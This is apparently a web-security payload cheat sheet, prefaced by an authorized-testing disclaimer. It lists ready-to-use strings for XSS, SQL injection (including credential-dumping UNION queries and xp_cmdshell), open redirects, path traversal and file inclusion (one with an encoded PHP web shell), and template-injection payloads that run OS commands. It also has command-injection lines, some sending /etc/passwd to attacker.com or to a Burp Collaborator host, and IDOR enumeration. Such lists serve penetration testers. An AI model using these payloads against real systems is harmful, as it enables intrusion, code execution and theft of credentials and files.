Comprehensive collection of security testing payloads organized by vulnerability type
These payloads are for authorized security testing only. Only use these on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal. Use responsibly and ethically.
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<iframe src="javascript:alert('XSS')">
<ScRiPt>alert('XSS')</sCriPt>
<img src=x onerror="alert(String.fromCharCode(88,83,83))">
<svg/onload=alert('XSS')>
<img src=x onerror=alert`XSS`>
javascript:alert('XSS')
<body onload=alert('XSS')>
" onmouseover="alert('XSS')
' autofocus onfocus='alert('XSS')
" autofocus onfocus="alert(document.domain)
<svg><animatetransform onbegin=alert('XSS')>
<input onfocus=alert('XSS') autofocus>
<select onfocus=alert('XSS') autofocus>
<textarea onfocus=alert('XSS') autofocus>
<keygen onfocus=alert('XSS') autofocus>
#<script>alert('XSS')</script>
javascript:alert(document.cookie)
<img src=x onerror=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>
' OR '1'='1
' OR 1=1--
" OR "1"="1
' OR 1=1#
admin'--
admin' #
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password FROM users--
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' AND 1=1--
' AND 1=2--
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a
' AND (SELECT 'a' FROM users LIMIT 1)='a
' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--
'; WAITFOR DELAY '00:00:05'--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND extractvalue(0x0a,concat(0x0a,(SELECT database())))--
' AND updatexml(null,concat(0x0a,(SELECT version())),null)--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' UNION SELECT @@version--
' UNION SELECT user()--
' UNION SELECT database()--
' UNION SELECT version()--
' UNION SELECT current_database()--
' UNION SELECT @@version--
'; EXEC xp_cmdshell('whoami')--
?url=https://evil.com
?redirect=https://evil.com
?return=https://evil.com
?next=https://evil.com
?url=//evil.com
?url=///evil.com
?url=////evil.com
?url=https:evil.com
?url=https;evil.com
?url=https://example.com@evil.com
?url=https://example.com.evil.com
?url=https://evil.com?example.com
?url=https://evil.com#example.com
?url=https://evil.com\@example.com
?url=https%3A%2F%2Fevil.com
?url=https%3a%2f%2fevil.com
?url=%68%74%74%70%73%3a%2f%2f%65%76%69%6c%2e%63%6f%6d
?url=javascript:alert(document.domain)
?url=javascript:window.location='https://evil.com'
?url=javascript:eval(atob('d2luZG93LmxvY2F0aW9uPSJodHRwczovL2V2aWwuY29tIg=='))
?file=../../../etc/passwd
?page=../../../../etc/passwd
?include=../../../../../../etc/passwd
?file=../../../etc/passwd%00
?file=../../../etc/passwd%00.jpg
?file=..%2F..%2F..%2Fetc%2Fpasswd
?file=..%252F..%252F..%252Fetc%252Fpasswd
?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
?file=../../../etc/passwd............[Add more dots to reach limit]
?file=php://filter/convert.base64-encode/resource=index.php
?file=php://input
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
?file=expect://whoami
?file=..\..\..\windows\system32\drivers\etc\hosts
?file=..\..\..\windows\win.ini
?file=C:\windows\system32\drivers\etc\hosts
?file=/var/log/apache2/access.log
?file=/var/log/nginx/access.log
?file=/var/log/mail.log
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
{{config.items()}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{['cat /etc/passwd']|filter('system')}}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }
${"freemarker.template.utility.ObjectConstructor"?new()("java.lang.ProcessBuilder","id").start()}
{system('id')}
{php}echo `id`;{/php}
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("id"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
<%= system("id") %>
<%= `id` %>
<%= IO.popen('id').readlines() %>
; whoami
| whoami
&& whoami
|| whoami
` whoami `
$(whoami)
; sleep 5
| sleep 5
&& ping -c 5 127.0.0.1
; nslookup burpcollaborator.net
| curl https://burpcollaborator.net
&& wget https://burpcollaborator.net
; curl https://attacker.com?data=$(cat /etc/passwd | base64)
| nslookup `whoami`.burpcollaborator.net
&& curl -X POST -d @/etc/passwd https://attacker.com
;w"h"o"a"m"i
;who$@ami
;w\ho\am\i
;${PATH:0:1}bin${PATH:0:1}whoami
& whoami
| whoami
|| whoami
&& whoami
%0a whoami
/api/user/1
/api/user/2
/api/user/100
/api/user/1000
# If your ID is 5432, test:
/api/user/5431
/api/user/5433
/api/user/5430
/api/user/5435
# Test different user's UUID
/api/user/a7b9c8d6-1234-5678-9abc-def012345678
/api/user/f9e8d7c6-5432-1098-fedc-ba0987654321
# Base64 encoded IDs
/api/user/MTIz (123)
/api/user/MTI0 (124)
/api/user/MTI1 (125)
POST /api/users
{"ids": [1, 2, 3, 4, 5, 100, 200]}
/api/user?id=123&id=456
/api/user?id[]=123&id[]=456
/api/user?user_id=123&userId=456
GET /api/user/123
POST /api/user/123
PUT /api/user/123
DELETE /api/user/123
PATCH /api/user/123
# Original request:
{"user_id": 123, "action": "view_profile"}
# Test with different IDs:
{"user_id": 124, "action": "view_profile"}
{"user_id": 1, "action": "view_profile"}
/api/user/../admin
/api/user/./1
/api/user/%2e%2e%2fadmin